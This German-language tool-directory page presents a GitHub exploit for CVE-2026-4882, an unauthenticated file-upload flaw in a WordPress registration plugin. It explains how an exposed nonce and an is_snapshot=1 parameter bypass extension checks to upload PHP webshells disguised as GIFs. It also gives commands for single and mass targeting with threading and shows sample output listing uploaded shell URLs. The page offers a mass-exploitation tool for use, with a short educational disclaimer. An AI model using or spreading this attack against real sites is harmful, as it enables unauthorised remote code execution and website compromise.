Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/xshadow-here/cve-2026-4882
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload

Beschreibung :

User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload Beschreibung Das User Registration Advanced Fields Plugin für WordPress (Versionen bis einschließlich 1.6.20) ist anfällig für nicht authentifizierten beliebigen Datei-Upload über die AJAX-Aktion uraf_profile_picture_upload_method_upload. Das Plugin gibt ein gültiges Nonce über wp_localize_script() auf jeder Seite frei, die ein Registrierungsformular enthält, und durch die Verwendung des Parameters is_snapshot=1 wird die Dateierweiterungsvalidierung vollständig umgangen. Dies ermöglicht nicht authentifizierten Angreifern, beliebige Dateien (z.B. als GIF-Bilder getarnte PHP-Webshells) hochzuladen, die in wp-content/uploads/user_registration_uploads/temp-uploads/ gespeichert werden, was zur vollständigen Remote-Code-Ausführung (RCE) führt.

INFO : CVE-2026-4882

~ CVSS-Score: 9.8 (Kritisch)

~ Betroffene Versionen: <= 1.6.20

  • Forscher : 0xd4rk5id3 - EnvoraSec

Nutzung :

Einzelziel :

  • python3 shadow.py -u https://target.com -s shadow.php

Massenziele :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

Interaktiver Modus :

  • python3 shadow.py
  • Eingabe des Ziel-Dateinamens
  • Eingabe der Threads 1-50 max

Funktionen :

  • Multi-Threading
  • Fehlerbehandlung
  • Automatische Nonce + Formular-ID-Ermittlung
  • Startseiten- & Sitemap-Crawling (benutzerdefinierte Registrierungspfade)
  • Brute-Force-Formular-ID-Fallback
  • Automatische HTTP/HTTPS-Weiterleitungsauflösung
  • GIF89a-Polyglot-Shell-Upload
  • Verifikations-Shell
  • Automatisches Speichern der Ergebnisse in shell.txt

Ausgabe :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

Haftungsausschluss :

Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitstestzwecken.

Die unbefugte Nutzung von Systemen, die dir nicht gehören oder für die du keine Berechtigung zum Testen hast, ist illegal.

Tool herunterladen